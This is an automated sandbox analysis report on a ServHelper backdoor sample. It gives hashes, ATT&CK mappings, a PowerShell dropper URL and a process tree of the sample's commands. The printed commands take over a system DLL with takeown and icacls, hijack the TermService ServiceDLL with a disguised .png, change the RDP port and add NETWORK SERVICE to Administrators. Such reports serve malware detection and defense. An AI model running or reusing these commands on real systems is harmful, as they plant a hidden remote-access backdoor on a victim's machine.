servhelper | 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12

Analysis

max time kernel
93s
max time network
121s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 09:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Size

4.5MB
MD5

2519d825ce34edc5881380dfe1a2f9c4
SHA1

642d87e38007682e8c60265ee59e67b09c32eb16
SHA256

08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12
SHA512

e4dfe0e8f3100824bd74942f4b97d39812055a572a1050ce8b18d0485c3f4bc42eb06c220ad4b145c055af7184ea31ca0274fcb029485f3cf90c8e81613c1ddd
SSDEEP

49152:E8CdRhKHG/xe5R7w0XQ5lh6aoBaD8NB+uLqXnVMlONTKFMc8XQDmDzE8k/9U1:E8eKHGJG

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
24	2136	powershell.exe
26	2136	powershell.exe
28	2136	powershell.exe
32	2136	powershell.exe
34	2136	powershell.exe
36	2136	powershell.exe
38	2136	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

448 icacls.exe
4560 icacls.exe
1756 icacls.exe
1352 icacls.exe
3716 icacls.exe
3312 icacls.exe
1904 icacls.exe
1380 takeown.exe

pid	process
448	icacls.exe
4560	icacls.exe
1756	icacls.exe
1352	icacls.exe
3716	icacls.exe
3312	icacls.exe
1904	icacls.exe
1380	takeown.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

964
964
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

4560 icacls.exe
1756 icacls.exe
1352 icacls.exe
3716 icacls.exe
3312 icacls.exe
1904 icacls.exe
1380 takeown.exe
448 icacls.exe

pid	process
964
964

pid	process
4560	icacls.exe
1756	icacls.exe
1352	icacls.exe
3716	icacls.exe
3312	icacls.exe
1904	icacls.exe
1380	takeown.exe
448	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

23 raw.githubusercontent.com
24 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D13.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D35.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zjuwlo4.nrz.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D23.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D34.tmp	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_b2vuby12.bpo.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D02.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2860 WMIC.exe

pid	process
2860	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4552 reg.exe
Runs net.exe

pid	process
4552	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5144	powershell.exe
5144	powershell.exe
5184	powershell.exe
5184	powershell.exe
2068	powershell.exe
2068	powershell.exe
4500	powershell.exe
4500	powershell.exe
5144	powershell.exe
5144	powershell.exe
5144	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

676
676

pid	process
676
676

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5144	powershell.exe
Token: SeDebugPrivilege	5184	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeRestorePrivilege	4560	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeAuditPrivilege	2860	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeAuditPrivilege	2860	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	5488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5488	WMIC.exe
Token: SeAuditPrivilege	5488	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	5488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5488	WMIC.exe
Token: SeAuditPrivilege	5488	WMIC.exe
Token: SeDebugPrivilege	2136	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 2636 wrote to memory of 5144	2636	08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe	powershell.exe
PID 2636 wrote to memory of 5144	2636	08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe	powershell.exe
PID 5144 wrote to memory of 2476	5144	powershell.exe	csc.exe
PID 5144 wrote to memory of 2476	5144	powershell.exe	csc.exe
PID 2476 wrote to memory of 3424	2476	csc.exe	cvtres.exe
PID 2476 wrote to memory of 3424	2476	csc.exe	cvtres.exe
PID 5144 wrote to memory of 5184	5144	powershell.exe	powershell.exe
PID 5144 wrote to memory of 5184	5144	powershell.exe	powershell.exe
PID 5144 wrote to memory of 2068	5144	powershell.exe	powershell.exe
PID 5144 wrote to memory of 2068	5144	powershell.exe	powershell.exe
PID 5144 wrote to memory of 4500	5144	powershell.exe	powershell.exe
PID 5144 wrote to memory of 4500	5144	powershell.exe	powershell.exe
PID 5144 wrote to memory of 1380	5144	powershell.exe	takeown.exe
PID 5144 wrote to memory of 1380	5144	powershell.exe	takeown.exe
PID 5144 wrote to memory of 448	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 448	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 4560	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 4560	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 1756	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 1756	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 1352	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 1352	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 3716	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 3716	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 3312	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 3312	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 1904	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 1904	5144	powershell.exe	icacls.exe
PID 5144 wrote to memory of 5604	5144	powershell.exe	reg.exe
PID 5144 wrote to memory of 5604	5144	powershell.exe	reg.exe
PID 5144 wrote to memory of 4552	5144	powershell.exe	reg.exe
PID 5144 wrote to memory of 4552	5144	powershell.exe	reg.exe
PID 5144 wrote to memory of 1064	5144	powershell.exe	reg.exe
PID 5144 wrote to memory of 1064	5144	powershell.exe	reg.exe
PID 5144 wrote to memory of 5968	5144	powershell.exe	net.exe
PID 5144 wrote to memory of 5968	5144	powershell.exe	net.exe
PID 5968 wrote to memory of 1768	5968	net.exe	net1.exe
PID 5968 wrote to memory of 1768	5968	net.exe	net1.exe
PID 5144 wrote to memory of 5712	5144	powershell.exe	cmd.exe
PID 5144 wrote to memory of 5712	5144	powershell.exe	cmd.exe
PID 5712 wrote to memory of 4768	5712	cmd.exe	cmd.exe
PID 5712 wrote to memory of 4768	5712	cmd.exe	cmd.exe
PID 4768 wrote to memory of 4608	4768	cmd.exe	net.exe
PID 4768 wrote to memory of 4608	4768	cmd.exe	net.exe
PID 4608 wrote to memory of 3260	4608	net.exe	net1.exe
PID 4608 wrote to memory of 3260	4608	net.exe	net1.exe
PID 5144 wrote to memory of 5736	5144	powershell.exe	cmd.exe
PID 5144 wrote to memory of 5736	5144	powershell.exe	cmd.exe
PID 5736 wrote to memory of 5688	5736	cmd.exe	cmd.exe
PID 5736 wrote to memory of 5688	5736	cmd.exe	cmd.exe
PID 5688 wrote to memory of 4312	5688	cmd.exe	net.exe
PID 5688 wrote to memory of 4312	5688	cmd.exe	net.exe
PID 4312 wrote to memory of 5300	4312	net.exe	net1.exe
PID 4312 wrote to memory of 5300	4312	net.exe	net1.exe
PID 4360 wrote to memory of 1740	4360	cmd.exe	net.exe
PID 4360 wrote to memory of 1740	4360	cmd.exe	net.exe
PID 1740 wrote to memory of 844	1740	net.exe	net1.exe
PID 1740 wrote to memory of 844	1740	net.exe	net1.exe
PID 3108 wrote to memory of 3996	3108	cmd.exe	net.exe
PID 3108 wrote to memory of 3996	3108	cmd.exe	net.exe
PID 3996 wrote to memory of 4708	3996	net.exe	net1.exe
PID 3996 wrote to memory of 4708	3996	net.exe	net1.exe
PID 5428 wrote to memory of 944	5428	cmd.exe	net.exe
PID 5428 wrote to memory of 944	5428	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
"C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5144

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES470B.tmp" "c:\Users\Admin\AppData\Local\Temp\wqdafupa\CSC9D0637ACDF5F4CC3821AF9E0A38D280.TMP"
4⤵
PID:3424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1380

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:448

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4560

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1756

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1352

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3716

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3312

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1904

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:5604

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:4552

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:1064

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:5968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:1768

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:5712

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:4608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:3260

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:5736

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:5688

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:5300

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:4676

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:5808

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
- Suspicious use of WriteProcessMemory
